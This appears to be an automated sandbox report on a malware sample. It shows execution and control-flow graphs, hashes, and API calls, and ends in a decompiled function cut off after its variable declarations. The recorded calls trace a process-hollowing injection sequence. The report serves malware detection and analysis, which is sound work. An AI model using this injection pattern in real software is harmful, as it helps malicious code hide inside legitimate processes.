                                                                      Reputation:high

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:31.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:2.2%
                                                                        Total number of Nodes:91
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 1621 29a2f98 1623 29a2fba 1621->1623 1626 29a2708 1623->1626 1630 29a26fd 1623->1630 1627 29a278f CreateProcessA 1626->1627 1629 29a29e4 1627->1629 1631 29a2708 CreateProcessA 1630->1631 1633 29a29e4 1631->1633 1634 29a3d9e 1638 29a24d8 1634->1638 1642 29a24d1 1634->1642 1635 29a36f7 1639 29a2524 ReadProcessMemory 1638->1639 1641 29a259c 1639->1641 1641->1635 1643 29a2524 ReadProcessMemory 1642->1643 1645 29a259c 1643->1645 1645->1635 1719 29a3cdd 1720 29a39d1 1719->1720 1721 29a39e6 1719->1721 1722 29a2048 ResumeThread 1720->1722 1723 29a2041 ResumeThread 1720->1723 1722->1721 1723->1721 1646 29a3a10 1647 29a3a21 1646->1647 1654 29a2258 1647->1654 1658 29a2260 1647->1658 1648 29a3a54 1648->1648 1662 29a2378 1648->1662 1666 29a2380 1648->1666 1649 29a3acd 1655 29a225e VirtualAllocEx 1654->1655 1657 29a231c 1655->1657 1657->1648 1659 29a22a4 VirtualAllocEx 1658->1659 1661 29a231c 1659->1661 1661->1648 1663 29a237f WriteProcessMemory 1662->1663 1665 29a2465 1663->1665 1665->1649 1667 29a2381 WriteProcessMemory 1666->1667 1669 29a2465 1667->1669 1669->1649 1732 29a35ea 1734 29a35f6 1732->1734 1733 29a39e6 1734->1733 1735 29a2048 ResumeThread 1734->1735 1736 29a2041 ResumeThread 1734->1736 1735->1733 1736->1733 1714 29a39ab 1715 29a39b5 1714->1715 1717 29a2048 ResumeThread 1715->1717 1718 29a2041 ResumeThread 1715->1718 1716 29a39e6 1717->1716 1718->1716 1670 29a388e 1671 29a3896 1670->1671 1673 29a2378 WriteProcessMemory 1671->1673 1674 29a2380 WriteProcessMemory 1671->1674 1672 29a38cd 1673->1672 1674->1672 1675 29a404c 1677 29a3eca 1675->1677 1678 29a39e6 1675->1678 1676 29a3675 1676->1678 1683 29a2041 1676->1683 1687 29a2048 1676->1687 1677->1676 1677->1677 1691 29a2130 1677->1691 1695 29a2138 1677->1695 1678->1678 1684 29a208c ResumeThread 1683->1684 1686 29a20d8 1684->1686 1686->1678 1688 29a208c ResumeThread 1687->1688 1690 29a20d8 1688->1690 1690->1678 1692 29a2137 SetThreadContext 1691->1692 1694 29a21f9 1692->1694 1694->1676 1696 29a2139 SetThreadContext 1695->1696 1698 29a21f9 1696->1698 1698->1676 1699 29a3b67 1700 29a3b73 1699->1700 1701 29a3b53 1700->1701 1702 29a2378 WriteProcessMemory 1700->1702 1703 29a2380 WriteProcessMemory 1700->1703 1702->1701 1703->1701 1709 29a2b84 1711 29a2b8d 1709->1711 1710 29a3419 1712 29a2708 CreateProcessA 1711->1712 1713 29a26fd CreateProcessA 1711->1713 1712->1710 1713->1710 1724 29a3ec4 1726 29a3eca 1724->1726 1725 29a3675 1727 29a39e6 1725->1727 1728 29a2048 ResumeThread 1725->1728 1729 29a2041 ResumeThread 1725->1729 1726->1725 1726->1726 1730 29a2138 SetThreadContext 1726->1730 1731 29a2130 SetThreadContext 1726->1731 1727->1727 1728->1727 1729->1727 1730->1725 1731->1725 1704 29a3485 1705 29a348a 1704->1705 1706 29a34d5 1705->1706 1707 29a2138 SetThreadContext 1705->1707 1708 29a2130 SetThreadContext 1705->1708 1707->1706 1708->1706

                                                                        Executed Functions

                                                                        Function 029A09D9 Relevance: .6, Instructions: 601COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 338 29a09d9-29a0a1c 339 29a0a1e 338->339 340 29a0a23-29a0ad1 338->340 339->340 342 29a0ae8-29a0aec 340->342 343 29a0aee-29a0af5 342->343 344 29a0ad3-29a0ae5 342->344 343->343 345 29a0af7-29a0afc 343->345 344->342 346 29a0b0e-29a0b3b 345->346 347 29a0afe-29a0b08 345->347 351 29a104d-29a1054 346->351 352 29a0b41-29a0b48 346->352 347->346 353 29a105a-29a1061 351->353 354 29a1199-29a11a0 351->354 352->352 355 29a0b4a-29a0c0f 352->355 353->353 358 29a1063-29a106a 353->358 356 29a11a2-29a11a9 354->356 357 29a11d0-29a1208 354->357 396 29a0c46-29a0c68 355->396 356->356 359 29a11ab-29a11cd 356->359 373 29a120a-29a120c 357->373 374 29a1215-29a1218 357->374 360 29a106c-29a1073 358->360 361 29a10d3-29a112f 358->361 360->360 363 29a1075-29a107f 360->363 388 29a1135-29a1159 361->388 367 29a10c0-29a10cd 363->367 368 29a1081-29a1088 363->368 367->361 368->368 370 29a108a-29a10be 368->370 370->361 379 29a120e 373->379 380 29a1213 373->380 376 29a121a 374->376 377 29a121f-29a1292 374->377 376->377 379->380 380->377 393 29a115b-29a1162 388->393 394 29a117d-29a1183 388->394 393->393 397 29a1164-29a1177 393->397 394->388 395 29a1185-29a118c 394->395 395->395 398 29a118e-29a1193 395->398 400 29a0c6a-29a0c71 396->400 401 29a0c11-29a0c1d 396->401 397->394 398->354 400->400 402 29a0c73-29a0c77 400->402 403 29a0c1f 401->403 404 29a0c24-29a0c30 401->404 405 29a0c79-29a0c80 402->405 406 29a0cad-29a0cc8 402->406 403->404 407 29a0c32-29a0c39 404->407 408 29a0c43 404->408 405->405 409 29a0c82-29a0ca7 405->409 413 29a0cca-29a0cd1 406->413 414 29a0d38-29a0e20 406->414 407->407 410 29a0c3b-29a0c41 407->410 408->396 409->406 410->402 413->413 415 29a0cd3-29a0cdd 413->415 431 29a0e8a-29a0eca 414->431 418 29a0cdf-29a0ce6 415->418 419 29a0d25-29a0d32 415->419 418->418 420 29a0ce8-29a0d23 418->420 419->414 420->414 433 29a0ede-29a0ee5 431->433 434 29a0ecc 431->434 433->433 437 29a0ee7-29a1047 433->437 435 29a0e22-29a0e7e 434->435 436 29a0ed2-29a0ed8 434->436 443 29a0e84-29a0e87 435->443 436->433 436->435 437->351 443->431
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af140d293bdc20a83399b91057251331716173209be7fc36493dede29163cc42
                                                                        • Instruction ID: c81bcf581722b64c7aea381e22d3c1a5d01b1a57e01eed415e78bf159ab349d9
                                                                        • Opcode Fuzzy Hash: af140d293bdc20a83399b91057251331716173209be7fc36493dede29163cc42
                                                                        • Instruction Fuzzy Hash: 5A52B278A00218CFDB64CF69D994B99BBB6BF49314F1081E9E809A7365D7319E81CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2F98 Relevance: .3, Instructions: 292COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ccf5a075ee02a7e00d5c66f26816bcf9762413b95c530e212b725c3337c34bb3
                                                                        • Instruction ID: 2fa5c9a2cd93953017932d9c3c0587fb536fa5e7ba86c1f82d741ce3539d9a43
                                                                        • Opcode Fuzzy Hash: ccf5a075ee02a7e00d5c66f26816bcf9762413b95c530e212b725c3337c34bb3
                                                                        • Instruction Fuzzy Hash: A5C12674D0932A8BDB24DF65D858BEDB7B2BF99300F1095EAC509A7240EB744AC0CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A26FD Relevance: 1.8, APIs: 1, Instructions: 325processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 29a26fd-29a27a1 3 29a27ea-29a2812 0->3 4 29a27a3-29a27ba 0->4 7 29a2858-29a28ae 3->7 8 29a2814-29a2828 3->8 4->3 9 29a27bc-29a27c1 4->9 17 29a28b0-29a28c4 7->17 18 29a28f4-29a29e2 CreateProcessA 7->18 8->7 19 29a282a-29a282f 8->19 10 29a27c3-29a27cd 9->10 11 29a27e4-29a27e7 9->11 14 29a27cf 10->14 15 29a27d1-29a27e0 10->15 11->3 14->15 15->15 16 29a27e2 15->16 16->11 17->18 26 29a28c6-29a28cb 17->26 37 29a29eb-29a2ad0 18->37 38 29a29e4-29a29ea 18->38 20 29a2852-29a2855 19->20 21 29a2831-29a283b 19->21 20->7 23 29a283f-29a284e 21->23 24 29a283d 21->24 23->23 27 29a2850 23->27 24->23 28 29a28ee-29a28f1 26->28 29 29a28cd-29a28d7 26->29 27->20 28->18 31 29a28db-29a28ea 29->31 32 29a28d9 29->32 31->31 34 29a28ec 31->34 32->31 34->28 50 29a2ad2-29a2ad6 37->50 51 29a2ae0-29a2ae4 37->51 38->37 50->51 54 29a2ad8 50->54 52 29a2ae6-29a2aea 51->52 53 29a2af4-29a2af8 51->53 52->53 55 29a2aec 52->55 56 29a2afa-29a2afe 53->56 57 29a2b08-29a2b0c 53->57 54->51 55->53 56->57 58 29a2b00 56->58 59 29a2b0e-29a2b37 57->59 60 29a2b42-29a2b4d 57->60 58->57 59->60 63 29a2b4e 60->63 63->63
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 029A29CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 0d10c863b368230ac9dfabc92eb77c16acff516e9088d32e6aa412a021a24df2
                                                                        • Instruction ID: 394f2188141bc2bb8e674621a227dfaa2b67f795d247b0448b169200b24c29da
                                                                        • Opcode Fuzzy Hash: 0d10c863b368230ac9dfabc92eb77c16acff516e9088d32e6aa412a021a24df2
                                                                        • Instruction Fuzzy Hash: C6C12871D0026D8FDB20CFA8C855BEEBBB5BF45308F0095A9D859B7240DB749A85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2708 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 65 29a2708-29a27a1 67 29a27ea-29a2812 65->67 68 29a27a3-29a27ba 65->68 71 29a2858-29a28ae 67->71 72 29a2814-29a2828 67->72 68->67 73 29a27bc-29a27c1 68->73 81 29a28b0-29a28c4 71->81 82 29a28f4-29a29e2 CreateProcessA 71->82 72->71 83 29a282a-29a282f 72->83 74 29a27c3-29a27cd 73->74 75 29a27e4-29a27e7 73->75 78 29a27cf 74->78 79 29a27d1-29a27e0 74->79 75->67 78->79 79->79 80 29a27e2 79->80 80->75 81->82 90 29a28c6-29a28cb 81->90 101 29a29eb-29a2ad0 82->101 102 29a29e4-29a29ea 82->102 84 29a2852-29a2855 83->84 85 29a2831-29a283b 83->85 84->71 87 29a283f-29a284e 85->87 88 29a283d 85->88 87->87 91 29a2850 87->91 88->87 92 29a28ee-29a28f1 90->92 93 29a28cd-29a28d7 90->93 91->84 92->82 95 29a28db-29a28ea 93->95 96 29a28d9 93->96 95->95 98 29a28ec 95->98 96->95 98->92 114 29a2ad2-29a2ad6 101->114 115 29a2ae0-29a2ae4 101->115 102->101 114->115 118 29a2ad8 114->118 116 29a2ae6-29a2aea 115->116 117 29a2af4-29a2af8 115->117 116->117 119 29a2aec 116->119 120 29a2afa-29a2afe 117->120 121 29a2b08-29a2b0c 117->121 118->115 119->117 120->121 122 29a2b00 120->122 123 29a2b0e-29a2b37 121->123 124 29a2b42-29a2b4d 121->124 122->121 123->124 127 29a2b4e 124->127 127->127
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 029A29CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 8b64e9e96106e4ea57478f83346b7d9ee7a59fb4ddf2fa35955f951228bebbe9
                                                                        • Instruction ID: c88bc40c1becedf35cf4f1866c73abb1392215d4a61f0c5520a3ea12425c7fa6
                                                                        • Opcode Fuzzy Hash: 8b64e9e96106e4ea57478f83346b7d9ee7a59fb4ddf2fa35955f951228bebbe9
                                                                        • Instruction Fuzzy Hash: EBC12871D0026D8FDB24CFA8C854BEEBBB5BF45308F0095A9D849B7240DB749A85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2378 Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 129 29a2378-29a237d 130 29a237f 129->130 131 29a2381-29a23eb 129->131 130->131 133 29a23ed-29a23ff 131->133 134 29a2402-29a2463 WriteProcessMemory 131->134 133->134 136 29a246c-29a24be 134->136 137 29a2465-29a246b 134->137 137->136
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 029A2453
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: a65edaa9447257e0e9255077663d0495978e7e21f2f342a4b02aa1744c40cf67
                                                                        • Instruction ID: 3146b7bb988782d63066c21c2c34dd8703fcf4b4c9d2345376b729fde98691e3
                                                                        • Opcode Fuzzy Hash: a65edaa9447257e0e9255077663d0495978e7e21f2f342a4b02aa1744c40cf67
                                                                        • Instruction Fuzzy Hash: F141BAB5D012588FCF00CFA9D984AEEFBF1BB49314F14942AE819BB200D735A946CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2380 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 142 29a2380-29a23eb 145 29a23ed-29a23ff 142->145 146 29a2402-29a2463 WriteProcessMemory 142->146 145->146 148 29a246c-29a24be 146->148 149 29a2465-29a246b 146->149 149->148
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 029A2453
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: 5d23020ac4f6486e4e5e7520e3272830c70398497eabfd8ea9567c01fa4f0580
                                                                        • Instruction ID: 965ae232a682b3c33d2ddf696f8296e93e6eb0c3c4eabe393f782ca541505687
                                                                        • Opcode Fuzzy Hash: 5d23020ac4f6486e4e5e7520e3272830c70398497eabfd8ea9567c01fa4f0580
                                                                        • Instruction Fuzzy Hash: 7941BBB4D002589FCF00CFA9D984AEEFBF5BB49314F14942AE818B7200D739AA45CF64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2258 Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 154 29a2258-29a225c 155 29a225e-29a22d3 154->155 156 29a22d4-29a231a VirtualAllocEx 154->156 155->156 159 29a231c-29a2322 156->159 160 29a2323-29a236d 156->160 159->160
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 029A230A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: c1332ba6f57ace8df4981eae5f7bd5c5174e6fc9411c8f318f36dcd5aa5aff63
                                                                        • Instruction ID: 60a3bda75eef19cd4a1898a666dbd2dae96c08276734287235a2a022c2a6624c
                                                                        • Opcode Fuzzy Hash: c1332ba6f57ace8df4981eae5f7bd5c5174e6fc9411c8f318f36dcd5aa5aff63
                                                                        • Instruction Fuzzy Hash: 7F41B8B8D002489FCF04CFA9D880AEEFBB5FB5A314F10946AE815B7210D735A906CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A24D1 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 166 29a24d1-29a259a ReadProcessMemory 169 29a259c-29a25a2 166->169 170 29a25a3-29a25f5 166->170 169->170
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 029A258A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: c2170e008d643ed136ff3622837a3815fada1816b17d374b90c88d465a2fb25f
                                                                        • Instruction ID: c3af1dd74a370ef53eb07d760b53e3bf335c297c795f6f5e2bedcb69ed4674e5
                                                                        • Opcode Fuzzy Hash: c2170e008d643ed136ff3622837a3815fada1816b17d374b90c88d465a2fb25f
                                                                        • Instruction Fuzzy Hash: 7441B8B9D002589FCF00CFA9D890AEEFBB1BB59314F14942AE815B7200D734A945CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A24D8 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 175 29a24d8-29a259a ReadProcessMemory 178 29a259c-29a25a2 175->178 179 29a25a3-29a25f5 175->179 178->179
                                                                        APIs
                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 029A258A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessRead
                                                                        • String ID:
                                                                        • API String ID: 1726664587-0
                                                                        • Opcode ID: 45a1cfb546631346589226dab28e4140988c85746c9e0b8090faf94a78a84c39
                                                                        • Instruction ID: e45313c07fd8d4ecdfe210b318139c0c1be1f8ffc2c54a8503cf337ff608f0ec
                                                                        • Opcode Fuzzy Hash: 45a1cfb546631346589226dab28e4140988c85746c9e0b8090faf94a78a84c39
                                                                        • Instruction Fuzzy Hash: FF41A9B9D002589FCF00CFE9D894AEEFBB5BB59314F14942AE815B7200D735A945CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2260 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 29a2260-29a231a VirtualAllocEx 188 29a231c-29a2322 184->188 189 29a2323-29a236d 184->189 188->189
                                                                        APIs
                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 029A230A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: bb77f3afc2fd5a1e5754c7519686efa339f3b00b044f833465a2c828afe5a4fe
                                                                        • Instruction ID: 66478fa41c772f62a154ebbc7e8fc0284060b74592cb681ee23fe633c62a5b90
                                                                        • Opcode Fuzzy Hash: bb77f3afc2fd5a1e5754c7519686efa339f3b00b044f833465a2c828afe5a4fe
                                                                        • Instruction Fuzzy Hash: B3318BB9D002589FCF10CFA9D980AEEFBB5FB59314F14942AE815B7200D735A946CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2130 Relevance: 1.6, APIs: 1, Instructions: 99threadinjectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 194 29a2130-29a2135 195 29a2139-29a2198 194->195 196 29a2137 194->196 198 29a219a-29a21ac 195->198 199 29a21af-29a21f7 SetThreadContext 195->199 196->195 198->199 201 29a21f9-29a21ff 199->201 202 29a2200-29a224c 199->202 201->202
                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 029A21E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: 80949d85845f554180b9bbf52cf08f0364deaf33896357d252af11675cd92e21
                                                                        • Instruction ID: 052722628c4ddf1321ae6fa9d2cc5b3dc9b81d9d4af16a94985091184d697c26
                                                                        • Opcode Fuzzy Hash: 80949d85845f554180b9bbf52cf08f0364deaf33896357d252af11675cd92e21
                                                                        • Instruction Fuzzy Hash: A841CEB5D002189FCB14CFA9D884AEEBBF5BB49314F24842AE815B7200D7789945CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2138 Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 207 29a2138-29a2198 210 29a219a-29a21ac 207->210 211 29a21af-29a21f7 SetThreadContext 207->211 210->211 213 29a21f9-29a21ff 211->213 214 29a2200-29a224c 211->214 213->214
                                                                        APIs
                                                                        • SetThreadContext.KERNELBASE(?,?), ref: 029A21E7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: ContextThread
                                                                        • String ID:
                                                                        • API String ID: 1591575202-0
                                                                        • Opcode ID: 45cac6dc6a14ad5960cdc8ad43f5d746bd6b87e069913bdc8b80c72eef3d1e60
                                                                        • Instruction ID: 513efb016270073853cb4fb8df2ba053cf380d134b80c05dc8bdcaa0919a8781
                                                                        • Opcode Fuzzy Hash: 45cac6dc6a14ad5960cdc8ad43f5d746bd6b87e069913bdc8b80c72eef3d1e60
                                                                        • Instruction Fuzzy Hash: 9F31BCB4D002589FCB14CFE9D884AEEBBF5BB49314F14842AE815BB200D738A945CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2041 Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 219 29a2041-29a20d6 ResumeThread 222 29a20d8-29a20de 219->222 223 29a20df-29a2121 219->223 222->223
                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 029A20C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: 6529742ae0a3d7d7232b391b37d07f677ba45fd01fa02106ecc9c24d635b79df
                                                                        • Instruction ID: 2aeb201bf1f40924394184919818f8af43f4bd8c7a61221f667d336b82a1c0cb
                                                                        • Opcode Fuzzy Hash: 6529742ae0a3d7d7232b391b37d07f677ba45fd01fa02106ecc9c24d635b79df
                                                                        • Instruction Fuzzy Hash: D331BAB4D002189FCB14CFA9E894AEEFBB5AF89314F14842AE819B7200C735A845CF94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 029A2048 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 228 29a2048-29a20d6 ResumeThread 231 29a20d8-29a20de 228->231 232 29a20df-29a2121 228->232 231->232
                                                                        APIs
                                                                        • ResumeThread.KERNELBASE(?), ref: 029A20C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.433554509.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_29a0000_gZU26RjMUU.jbxd
                                                                        Similarity
                                                                        • API ID: ResumeThread
                                                                        • String ID:
                                                                        • API String ID: 947044025-0
                                                                        • Opcode ID: e22257ff6345090507e6eff808b54e6a650c05b1832bf9e316a81b93ffe346ce
                                                                        • Instruction ID: b462429e4479ceb192f6e1998bc5188a365c90daacc6a82c323d15cb585417c5
                                                                        • Opcode Fuzzy Hash: e22257ff6345090507e6eff808b54e6a650c05b1832bf9e316a81b93ffe346ce
                                                                        • Instruction Fuzzy Hash: 9A31A9B4D012189FCB14CFA9E884AEEFBB5AB49314F14842AE815B7300D735A945CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00840CE7 Relevance: 2.0, Strings: 1, Instructions: 754COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E00840CE7(signed int __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr* __esi) {
				signed char _t388;
				signed int _t390;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed char _t402;
				signed int _t403;
				signed char _t406;
				signed char _t410;
				intOrPtr* _t412;
				intOrPtr* _t413;
				signed int _t415;
				intOrPtr* _t418;
				intOrPtr* _t419;
				intOrPtr* _t420;
				intOrPtr* _t421;
				intOrPtr* _t422;
				signed char _t423;
				intOrPtr* _t424;
				intOrPtr* _t425;
				intOrPtr* _t426;
				intOrPtr* _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				intOrPtr* _t430;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t436;
				signed char _t437;
				signed int _t438;
				signed int _t439;
				signed char _t441;
				signed char _t443;
				signed char _t444;
				signed char _t445;
				intOrPtr* _t446;
				intOrPtr* _t447;
				intOrPtr* _t448;
				intOrPtr* _t449;
				intOrPtr* _t450;
				intOrPtr* _t451;
				intOrPtr* _t452;
				intOrPtr* _t455;
				intOrPtr* _t458;
				signed int _t459;
				intOrPtr* _t460;
				intOrPtr* _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed char _t469;
				void* _t471;
				void* _t472;
				void* _t473;
				void* _t474;
				intOrPtr* _t475;
				void* _t476;
				signed char _t477;
				signed char _t479;
				intOrPtr* _t480;
				signed char _t481;
				intOrPtr* _t484;
				void* _t487;
				void* _t488;
				void* _t489;
				void* _t491;
				void* _t492;
